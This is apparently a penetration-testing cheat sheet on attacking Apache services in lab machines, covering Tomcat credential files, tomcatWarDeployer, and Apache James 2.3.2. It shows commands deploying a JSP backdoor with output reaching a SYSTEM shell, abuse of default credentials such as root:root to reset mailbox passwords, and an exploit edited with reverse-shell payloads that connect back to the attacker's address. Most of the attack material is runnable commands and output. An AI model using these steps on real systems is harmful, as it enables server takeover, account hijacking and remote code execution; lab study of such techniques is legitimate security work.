# Apache

## Home Directory

* [http://$IP/\~mike](http://$ip/~mike)
* Apache may be configured to give users Home directory
* <https://httpd.apache.org/docs/2.4/howto/public_html.html>

## FreeBSD Apache

* <https://blog.codeasite.com/how-do-i-find-apache-http-server-log-files/>

```
/usr/local/www/apache24/data/
/var/log/httpd-error.log
/var/log/httpd-access.log
```

## Tomcat

```
Password is sometimes kept:
Directory where tomcat is installed
Directory starting with tomcat in /etc/
'tomcat-users.xml'

Example: /etc/tomcat7/tomcat-users.xml
Check: cat /etc/passwd .. see where tomcat profile lives
```

## tomcatWarDeployer

* Vuln: Apache Tomcat/7.0.88
* REF: JerryHTB
* <https://github.com/mgeeky/tomcatWarDeployer>
* git clone <https://github.com/mgeeky/tomcatWarDeployer.git>

```
Example: 
> python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080

python error: no module named 'mechanize'
>> sudo apt install python-pip
>> pip install mechanize

Again with Creds:
>> sudo python ./tomcatWarDeployer.py -v -x --user=tomcat --pass=s3cret -n hello2 -p 4449 -H 10.10.14.189 10.10.10.95:8080

==== JSP Backdoor ====
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/hello2/
INFO: 
Happy pwning. Here take that password for web shell: '8EWh0JeCrmN0'
INFO: ------------------------------------------------------------

SUCCESS!!!!!


http://10.10.10.95:8080/hello2/
8EWh0JeCrmN0

> whoami
nt authority\system

```

## Config Password

```

more C:\conf\tomcat-users.xml
more C:\apache-tomcat-7.0.88\tomcat-users.xml

<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
   <user username="tomcat" password="s3cret" roles="tomcat, manager-gui"/>
   <user username="admin" password="admin" roles="role1, manager-status"/>
   <user username="jerry" password="tomcat" roles="role1, manager-status"/>
</tomcat-users>
```

## Apache James Server 2.3.2

* Java Apache Mail Enterprise Server (JAMES)
  * Open source SMTP and POP3 mail transfer agent and NNTP news server
  * <https://james.apache.org/>
  * Default Login: **root:root**
* Connect and Reset user-email password
* Then use [Thunderbird](https://pentest.mxhx.org/03-getting-in/email-smtp#thunderbird) email to look for clues

```
nc $IP 4555
admin:admin ..fail
root:root   ..ok
help
listusers
setpassword admin password
setpassword mindy password  ..next use thunderbird to read emails
```

* Exploit:

```
-------------------------
searchsploit james
searchsploit -m linux/remote/35513.py

vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'

nc -nvlp 4444
python 35513.py $IP
ssh user@server  ..to pop the exploit

-------------------------
james will 
adduser ../../../etc/bash_completion.d
sends email to directory with our payload
when somebody logs in, payload gets executed
```